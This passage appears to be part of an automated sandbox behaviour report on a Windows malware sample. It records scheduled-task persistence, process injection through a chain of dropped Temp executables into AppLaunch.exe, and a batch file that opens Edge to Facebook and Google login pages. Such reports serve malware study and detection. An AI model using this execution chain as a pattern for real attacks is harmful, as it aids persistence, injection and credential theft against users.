Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B8D0.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1844 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 1844 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 1844 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 4904 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 4904 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 4904 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 324 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4904 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe
PID 4904 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe
PID 4904 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1844 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe
PID 1844 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe
PID 1844 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe
PID 4180 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe C:\Windows\system32\cmd.exe
PID 4180 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe C:\Windows\system32\cmd.exe
PID 4920 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 2288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 2288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2616 wrote to memory of 1648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2616 wrote to memory of 1648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe

"C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 324 -ip 324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 324 -s 588

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3300 -ip 3300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1424 -ip 1424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2F39.tmp\2F3A.tmp\2F3B.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9503094431007173937,12839974700246991723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9503094431007173937,12839974700246991723,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

